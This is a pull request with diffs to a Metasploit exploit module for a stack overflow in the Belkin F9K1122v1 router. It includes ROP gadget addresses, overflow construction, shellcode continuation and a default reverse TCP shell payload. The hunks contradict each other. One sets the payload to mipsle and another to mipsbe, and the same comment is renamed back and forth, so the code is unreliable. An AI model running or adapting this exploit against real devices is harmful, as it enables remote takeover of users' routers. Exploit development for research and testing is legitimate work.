### PR TITLE
Updated ranking, changed syntax on gadgets, and added a DefaultPayload

### DIFF
--- a/belkin_exploit.rb
+++ b/belkin_exploit.rb
@@ -125,10 +125,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
     ### Process Continuation ###
 
-    ## Zero out global vars "request_ready" and "connections"
+    ## Zero out global vars "request_ready" and "total_connections"
     ## $t0 == 0x00000000
     continutation  = [0xaee83340].pack("N") # sw t0, 0x3340(s7) request_ready
-    continutation << [0xaee83360].pack("N") # sw t0, 0x3360(s7) connections
+    continutation << [0xaee83360].pack("N") # sw t0, 0x3360(s7) total_connections
    
     ## Execute Shellcode
     continutation << shellcode

--- a/belkin_exploit.rb
+++ b/belkin_exploit.rb
@@ -44,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Remote
             }
           ]
         ],
-      'DefaultOptions' => { 'PAYLOAD' => 'linux/mipsle/shell_reverse_tcp' },
+      'DefaultOptions' => { 'PAYLOAD' => 'linux/mipsbe/shell_reverse_tcp' },
       'DisclosureDate' => 'September 4 2016',
       'DefaultTarget' => 0))
   end

--- a/belkin_exploit.rb
+++ b/belkin_exploit.rb
@@ -4,7 +4,7 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Remote
-  Rank = NormalRanking
+  Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
 
@@ -36,14 +36,15 @@ class MetasploitModule < Msf::Exploit::Remote
         [
           [ 'Belkin F9K1122v1 - v1.00.30',
             {
-              'Offset' => 103,
-              'Sleep'  => 0x2aaf2c80,
+              'offset' => 103,
+              'sleep'  => 0x2aaf2c80,
               'rop1'   => 0x2aafc840, # move t9,s0; jalr t9; addiu a1,s1,4; beqz v0,0x2aafc88c; lw ra,36(sp); jr ra; addiu sp,sp,40
-              'rop2'   => 0x2aaf9808, # addiu a0,sp,24; lw ra,52(sp); jr ra
+              'rop2'   => 0x2aaf9808, # addiu a0,sp,24; lw ra,52(sp); jr ra; addiu sp,sp,56
               'rop3'   => 0x2aaf97fc  # move t9,a0; sw v0,24(sp); jalr t9; addiu a0,sp,24
             }
           ]
         ],
+      'DefaultOptions' => { 'PAYLOAD' => 'linux/mipsle/shell_reverse_tcp' },
       'DisclosureDate' => 'September 4 2016',
       'DefaultTarget' => 0))
   end
@@ -124,10 +125,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
     ### Process Continuation ###
 
-    ## Zero out global vars "request_ready" and "total_connections"
+    ## Zero out global vars "request_ready" and "connections"
     ## $t0 == 0x00000000
     continutation  = [0xaee83340].pack("N") # sw t0, 0x3340(s7) request_ready
-    continutation << [0xaee83360].pack("N") # sw t0, 0x3360(s7) total_connections
+    continutation << [0xaee83360].pack("N") # sw t0, 0x3360(s7) connections
    
     ## Execute Shellcode
     continutation << shellcode
@@ -158,8 +159,8 @@ class MetasploitModule < Msf::Exploit::Remote
     continutation << lhost_lport
     
     ## Craft the overflow and trigger the vuln
-    overflow  = rand_text_alpha_upper(@my_target['Offset'])  # Padding
-    overflow << [@my_target['Sleep']].pack("N")              # $s0
+    overflow  = rand_text_alpha_upper(@my_target['offset'])  # Padding
+    overflow << [@my_target['sleep']].pack("N")              # $s0
     overflow << rand_text_alpha_upper(4)                     # $s1
     overflow << [@my_target['rop1']].pack("N")               # $ra -> rop1
     overflow << rand_text_alpha_upper(9*4)                   # Padding


### PR DESCRIPTION
Since the reverse TCP shell is being generated by the HTTP daemon, the payload should default to '**linux/mipsbe/shell_reverse_tcp**' to prevent handler issues. Also this exploit contains reliable process continuation, so the ranking has been updated to "Excellent". 